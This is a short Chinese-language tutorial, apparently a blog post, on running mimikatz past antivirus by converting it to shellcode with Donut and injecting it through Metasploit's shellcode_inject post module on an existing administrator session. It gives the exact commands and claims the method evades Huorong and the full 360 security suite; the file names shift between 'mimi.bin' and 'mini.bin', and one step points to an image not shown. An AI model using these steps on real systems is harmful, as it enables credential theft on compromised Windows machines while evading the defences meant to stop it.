minikatz免杀之msf加载bin文件
准备工作
donut 0.9.2版本稳定 https://github.com/TheWover/donut
shellcode_inject.rb kali自带,目录/usr/share/metasploit-framework/modules/post/windows/manage/
步骤
1.使用Donut对需要执行的文件进行shellcode生成,这里对mimikatz进行shellcode生成,生成mini.bin文件,放到msf服务器上。留着备用。
donut.exe -f mimikatz.exe -a 2 -o mimi.bin
2.有session会话,管理员权限。
3.调用msf-shellcode_inject注入模块,
use post/windows/manage/shellcode_inject
session 1
set shellcode
set shellcode /root/test/mini.bin
run
为了可以直接回来会话,设置下面图片中的false为true,不然无交互式界面。
运行,直接回来minikatz交互式页面。
过火绒
360全套
